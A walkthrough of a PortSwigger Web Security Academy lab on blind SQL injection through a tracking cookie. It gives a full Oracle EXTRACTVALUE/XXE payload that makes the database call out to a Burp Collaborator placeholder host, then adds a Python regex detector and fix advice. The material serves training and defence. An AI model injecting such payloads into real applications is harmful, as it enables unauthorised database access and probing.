Blind SQL Injection with Out-of-band Interaction - PortSwigger Lab Walkthrough

Hacker2255

Introduction

In this walkthrough, we will exploit a blind SQL injection vulnerability that allows out-of-band (OAST) interaction, using Burp Collaborator. This lab is from PortSwigger’s Web Security Academy and requires us to generate a DNS lookup to an external server.

Understanding the Lab

The application:

  1. Uses a tracking cookie for analytics.

  2. Executes a SQL query containing the submitted cookie value.

  3. Runs the SQL query asynchronously, so the response carries no evidence of injection.

  4. Allows out-of-band (OOB) interactions with an external domain.

To solve this, we must trigger a DNS lookup to Burp Collaborator by injecting a SQL payload.

Exploitation Steps

Step 1: Set Up Burp Collaborator

  1. Open Burp Suite and go to Burp Collaborator.

  2. Click Copy to clipboard to get your unique Burp Collaborator payload (e.g., xyz.burpcollaborator.net).

Step 2: Identify the Injection Point

  1. Open Burp Suite Proxy and capture a request that contains a tracking cookie (likely in the Cookie header).

  2. Send the request to Burp Repeater and modify the cookie value to test for injection:

    ' OR '1'='1

  3. Observe that the response does not change. The injection cannot be confirmed from the response, which suggests that any injection here is blind.

Step 3: Trigger an Out-of-Band DNS Lookup

Inject a payload that forces a DNS lookup to Burp Collaborator:

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

Step 4: Verify the Interaction

  1. Go to Burp Collaborator and click Poll Now.

  2. If an HTTPS/DNS request appears, the injection worked!

  3. The lab should now be solved.
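From the defender's side, the request used in Steps 2 and 3 leaves recognisable markers in the Cookie header. The following detection sketch is an added example, not part of the original walkthrough: the rule names, the `scan_cookie_header` helper and the sample headers are assumptions constructed for illustration, and the patterns are derived only from the payloads shown above.

```python
import re
from urllib.parse import unquote_plus

# Illustrative rules derived from the payloads in Steps 2 and 3 (not a complete signature set).
RULES = {
    # A quote that closes the string literal, followed by SQL keywords.
    "quote_breakout": re.compile(r"'\s*(?:union\s+select|or\s+')", re.I),
    # Oracle XML functions that have no place in a tracking identifier.
    "oracle_xml_function": re.compile(r"\b(?:extractvalue|xmltype)\s*\(", re.I),
    # An external entity that points at a remote host (the out-of-band trigger).
    "external_entity": re.compile(
        r"<!ENTITY\s+%?\s*\w+\s+SYSTEM\s+[\"']https?://", re.I),
}

def scan_cookie_header(header, cookie_name="TrackingId"):
    """Return the sorted rule names matched by the URL-decoded cookie value."""
    for part in header.split(";"):
        name, _, raw = part.strip().partition("=")
        if name == cookie_name:
            # Assumption: the application URL-decodes the cookie once, as in the lab.
            value = unquote_plus(raw)
            return sorted(rule for rule, rx in RULES.items() if rx.search(value))
    return []

# Constructed sample Cookie headers. The last one is the Step 3 payload with
# the placeholder host left in place.
BENIGN_COOKIE = "TrackingId=Zq3kP0aT9xLm2VbE; session=abc123"
PROBE_COOKIE = "TrackingId=' OR '1'='1; session=abc123"
PAYLOAD_COOKIE = (
    "TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('"
    '<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>'
    '<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+'
    '"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'
    "'),'/l')+FROM+dual--"
)

if __name__ == "__main__":
    for header in (BENIGN_COOKIE, PROBE_COOKIE, PAYLOAD_COOKIE):
        print(scan_cookie_header(header), header[:50])
```

Pattern matching of this kind is a detection aid only. The fix is to bind the cookie value as a query parameter and to block outbound DNS and HTTP from the database host.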

Conclusion

This lab demonstrates a blind SQL injection with OOB interaction, useful when:

  1. No direct response-based feedback is available.

  2. The database allows external network interactions.

  3. A tool such as Burp Collaborator is available to help confirm the injection.
